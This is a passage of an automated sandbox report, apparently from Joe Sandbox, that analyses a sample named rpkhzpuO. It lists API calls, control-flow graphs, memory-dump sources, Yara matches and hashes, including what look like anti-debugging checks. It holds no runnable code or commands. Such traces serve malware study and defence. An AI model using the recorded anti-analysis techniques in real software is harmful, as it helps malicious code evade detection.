                                                                                                                                      • Instruction ID: 2b4c6693f154ffd7e83f142dd043f0d03095f7d1a6c57373ec3d573839626100
                                                                                                                                      • Opcode Fuzzy Hash: b2c14653403d72c050b39706e0a1e81bab7130f51279f8bb7dd252f3ba1e6c13
                                                                                                                                      • Instruction Fuzzy Hash: BA6139B4A003499FEB15DFA5C854B9DFBF2FF88340F108429E816AB290DB359846CF54

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 435 40e7ee-40e7f6 call 40e7c3 437 40e7fb-40e7ff ExitProcess 435->437
                                                                                                                                      APIs
                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 438 351854c8-3518556b GetCurrentThreadId 442 3518556d-35185573 438->442 443 35185574-351855b5 call 35184364 438->443 442->443
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 3518555A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                      • Opcode ID: 82c8e83d64718e9e39263ed02e21600570f1db8f8bea9459ca93950cd16ebb9e
                                                                                                                                      • Instruction ID: 32ddf0b47e8a2e4cb7c8e22311ff103a0ec1fe4cd3af6bd8dfb29e1816328d90
                                                                                                                                      • Opcode Fuzzy Hash: 82c8e83d64718e9e39263ed02e21600570f1db8f8bea9459ca93950cd16ebb9e
                                                                                                                                      • Instruction Fuzzy Hash: E33123B490024ACFDB10CFA9D480B9EBBF0FF49314F14856AD418BB211D779A946CFA5

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 448 351838e1-351838e3 449 351838e8-3518397c DuplicateHandle 448->449 450 3518397e-35183984 449->450 451 35183985-351839a2 449->451 450->451
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3518396F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: f1f99e875c43f1cfd3b4a1d756cc85de3fd3afad6b7b3568e6aba9835e223b0c
                                                                                                                                      • Instruction ID: 801c2ab123468f265612ebf47f5ff76b79529f5c1a358ee0f1a5f904b356ab24
                                                                                                                                      • Opcode Fuzzy Hash: f1f99e875c43f1cfd3b4a1d756cc85de3fd3afad6b7b3568e6aba9835e223b0c
                                                                                                                                      • Instruction Fuzzy Hash: 9821E5B5D00249EFDB10CFAAD984ADEBBF8EB48310F14841AE918A7350D378A944CF65

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 454 351838e8-3518397c DuplicateHandle 455 3518397e-35183984 454->455 456 35183985-351839a2 454->456 455->456
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3518396F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 3cf4e7ee546ed15022e7d9c5677d92cd616f39444217d97768de403bd6a4cf70
                                                                                                                                      • Instruction ID: 2635ed002158e0e6e65f8e70ea5096689547a1e1643535bd2001b68eb89b4115
                                                                                                                                      • Opcode Fuzzy Hash: 3cf4e7ee546ed15022e7d9c5677d92cd616f39444217d97768de403bd6a4cf70
                                                                                                                                      • Instruction Fuzzy Hash: B221A4B5D00249DFDB10CFAAD984ADEFBF8EB48310F14841AE958A7350D378A954CF65

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 459 351855c0-3518560a 461 3518560c 459->461 462 35185616-35185646 EnumThreadWindows 459->462 465 35185614 461->465 463 35185648-3518564e 462->463 464 3518564f-3518567c 462->464 463->464 465->462
                                                                                                                                      APIs
                                                                                                                                      • EnumThreadWindows.USER32(?,00000000,?), ref: 35185639
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumThreadWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2941952884-0
                                                                                                                                      • Opcode ID: f1d52f1d984191a34f5739e541d8a65a836ebfad1ffb8704b1aabf374a16c8bf
                                                                                                                                      • Instruction ID: a005a8d4b44d7549a246436e7fa0d3fddcb139cb76645545acff87d1c4d7c5a6
                                                                                                                                      • Opcode Fuzzy Hash: f1d52f1d984191a34f5739e541d8a65a836ebfad1ffb8704b1aabf374a16c8bf
                                                                                                                                      • Instruction Fuzzy Hash: 222135B1900209DFDB10CF9AC840BEEFBF4EB88320F10842AD415A3250D778A945CF65

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 468 35181f9c-3518599b 470 3518599d-351859a0 468->470 471 351859a3-351859a7 468->471 470->471 472 351859a9-351859ac 471->472 473 351859af-351859e2 MessageBoxW 471->473 472->473 474 351859eb-351859ff 473->474 475 351859e4-351859ea 473->475 475->474
                                                                                                                                      APIs
                                                                                                                                      • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,351822A5,?,?,?), ref: 351859D5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2030045667-0
                                                                                                                                      • Opcode ID: 8f33f83841e6c7bd6d08265bc8070c1815442f49b1e2009538be7af577d51582
                                                                                                                                      • Instruction ID: 0fd8cf57267484a253a363f3cbb6d3a198a459107da5d213034128f9efa9d583
                                                                                                                                      • Opcode Fuzzy Hash: 8f33f83841e6c7bd6d08265bc8070c1815442f49b1e2009538be7af577d51582
                                                                                                                                      • Instruction Fuzzy Hash: 0721F3B5C04349EFDB10CF9AD884ADEBBB5FB88320F11842AE519A7200C375A944CFA5

                                                                                                                                       Control-flow Graph
                                                                                                                                       • Basic blocks: 477 [35185950-3518599b], 479 [3518599d-351859a0], 480 [351859a3-351859a7], 481 [351859a9-351859ac], 482 [351859af-351859e2] MessageBoxW, 483 [351859eb-351859ff], 484 [351859e4-351859ea]
                                                                                                                                       • Edges: 477->479, 477->480, 479->480, 480->481, 480->482, 481->482, 482->483, 482->484, 484->483
                                                                                                                                      APIs
                                                                                                                                      • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,351822A5,?,?,?), ref: 351859D5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2030045667-0
                                                                                                                                      • Opcode ID: 1d6cf9b404578fef429133afad3ef80aed05903d7920fd510a944272185eddf1
                                                                                                                                      • Instruction ID: bb61b479f83b8d6f88bd2cad2fbf7c879520b31c032a640736e7679c923809fb
                                                                                                                                      • Opcode Fuzzy Hash: 1d6cf9b404578fef429133afad3ef80aed05903d7920fd510a944272185eddf1
                                                                                                                                      • Instruction Fuzzy Hash: 2821F3B5D05349DFCB10CF9AD884ADEBBB5FB88310F11846ED459A7200C375A944CFA5

                                                                                                                                       Control-flow Graph
                                                                                                                                       • Basic blocks: 486 [351855c8-3518560a], 487 [3518560c], 488 [35185616-35185646] EnumThreadWindows, 491 [35185614], 489 [35185648-3518564e], 490 [3518564f-3518567c]
                                                                                                                                       • Edges: 486->487, 486->488, 487->491, 488->489, 488->490, 489->490, 491->488
                                                                                                                                      APIs
                                                                                                                                      • EnumThreadWindows.USER32(?,00000000,?), ref: 35185639
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumThreadWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2941952884-0
                                                                                                                                      • Opcode ID: f57cd5a64810277233b6be917a3736e70f4089677b87109e04b8f9add32c79aa
                                                                                                                                      • Instruction ID: 41ff899c3c46fc913eae037e35524524ee95836303e545b440742c72a2e20f51
                                                                                                                                      • Opcode Fuzzy Hash: f57cd5a64810277233b6be917a3736e70f4089677b87109e04b8f9add32c79aa
                                                                                                                                      • Instruction Fuzzy Hash: 1F2124B190060ADFDB10CF9AC940BEEFBF8EB88320F14842AD415A7250D778A945CF65
                                                                                                                                      APIs
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 31D791A4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2731211299.0000000031D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 31D70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31d70000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 251b26b1245e6d88c8fbd426da1c12dbfc570a0356997cdb8f99289d9dd168fd
                                                                                                                                      • Instruction ID: a5ad447b7536e9bf7102f61d74c3ea20946c69a9dfdcd4c290df73cca9dfb18f
                                                                                                                                      • Opcode Fuzzy Hash: 251b26b1245e6d88c8fbd426da1c12dbfc570a0356997cdb8f99289d9dd168fd
                                                                                                                                      • Instruction Fuzzy Hash: A41124B19003499FDB10DFAAC880A9EFBF4EF88320F10842AD419A7200C7799900CFA5
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                       • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                       • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 959018026-0
                                                                                                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                       • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                       • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                      APIs
                                                                                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                       • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                       • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2731211299.0000000031D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 31D70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31d70000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                      • Opcode ID: 04e000368eb8136490b6e3ffdf018f4612043fe40fff679ce6d6c6d840f83a95
                                                                                                                                      • Instruction ID: f015c6308ff94bb11c875611a44bf323eab525923eec079b584e6b147ec49807
                                                                                                                                      • Opcode Fuzzy Hash: 04e000368eb8136490b6e3ffdf018f4612043fe40fff679ce6d6c6d840f83a95
                                                                                                                                      • Instruction Fuzzy Hash: 77113AB1900349CFDB10DFAAC4457DEFBF4AF89720F248419D519A7240CB79A940CBA5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: de516d01558c36048a984cdd0a693d25ab42f0a7bd18a4958dd78c6f7f021646
                                                                                                                                      • Instruction ID: 7f974d6c4e025f32f94e329f7555c75c602c5a2ccacb59b174ee49dad1a061a8
                                                                                                                                      • Opcode Fuzzy Hash: de516d01558c36048a984cdd0a693d25ab42f0a7bd18a4958dd78c6f7f021646
                                                                                                                                      • Instruction Fuzzy Hash: B72133B6504340EFEF12DF10D9D0B26BF61FB98310F2089A8E8084B206C336D846CBA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ae3c8c89933af1faa1eef4e81470267d60e321b142d95c3f452eb08a127a8d8c
                                                                                                                                      • Instruction ID: 562b56c5ac4358ae20976a80edc0a1cfd9a026c56900ffef981d000357b2fe12
                                                                                                                                      • Opcode Fuzzy Hash: ae3c8c89933af1faa1eef4e81470267d60e321b142d95c3f452eb08a127a8d8c
                                                                                                                                      • Instruction Fuzzy Hash: 43210676504384DFEF01EF10DDD0B26BF66FBA4714F208569E9084B24AC33AD856CBA2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
APIs
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
Memory Dump Source
• Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,31B118E8), ref: 004170C5
• MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
• _malloc.LIBCMT ref: 0041718A
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• _malloc.LIBCMT ref: 0041724C
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• __freea.LIBCMT ref: 004172A4
• __freea.LIBCMT ref: 004172AD
• ___ansicp.LIBCMT ref: 004172DE
• ___convertcp.LIBCMT ref: 00417309
• LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
• _malloc.LIBCMT ref: 00417362
• _memset.LIBCMT ref: 00417384
• LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
• ___convertcp.LIBCMT ref: 004173BA
• __freea.LIBCMT ref: 004173CF
• LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
Yara matches
Similarity
• API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
• String ID:
• API String ID: 3809854901-0
APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Yara matches
Similarity
• API ID: _malloc$AllocateHeap
• String ID: 1.2.3
• API String ID: 680241177-2310465506
APIs
Yara matches
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
APIs
• EntryPoint.RPKHZPUO(80070057), ref: 004017EE
  • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
  • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
• EntryPoint.RPKHZPUO(80070057), ref: 00401800
• EntryPoint.RPKHZPUO(80070057), ref: 00401813
• __recalloc.LIBCMT ref: 00401828
• EntryPoint.RPKHZPUO(8007000E), ref: 00401839
• EntryPoint.RPKHZPUO(8007000E), ref: 00401853
• _calloc.LIBCMT ref: 00401861
Yara matches
Similarity
• API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
• String ID:
• API String ID: 1721462702-0

APIs
• __getptd.LIBCMT ref: 00414744
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __getptd.LIBCMT ref: 0041475B
• __amsg_exit.LIBCMT ref: 00414769
• __lock.LIBCMT ref: 00414779
Memory Dump Source
• Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618

APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Similarity
• API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
• String ID:
• API String ID: 2805327698-0

APIs
• __getptd.LIBCMT ref: 00413FD8
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __amsg_exit.LIBCMT ref: 00413FF8
• __lock.LIBCMT ref: 00414008
• InterlockedDecrement.KERNEL32(?), ref: 00414025
• InterlockedIncrement.KERNEL32(31B11688), ref: 00414050
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0

APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591

APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0

APIs
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0

APIs
• __flush.LIBCMT ref: 0040BB6E
• __fileno.LIBCMT ref: 0040BB8E
• __locking.LIBCMT ref: 0040BB95
• __flsbuf.LIBCMT ref: 0040BBC0
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Similarity
• API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 3240763771-0

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
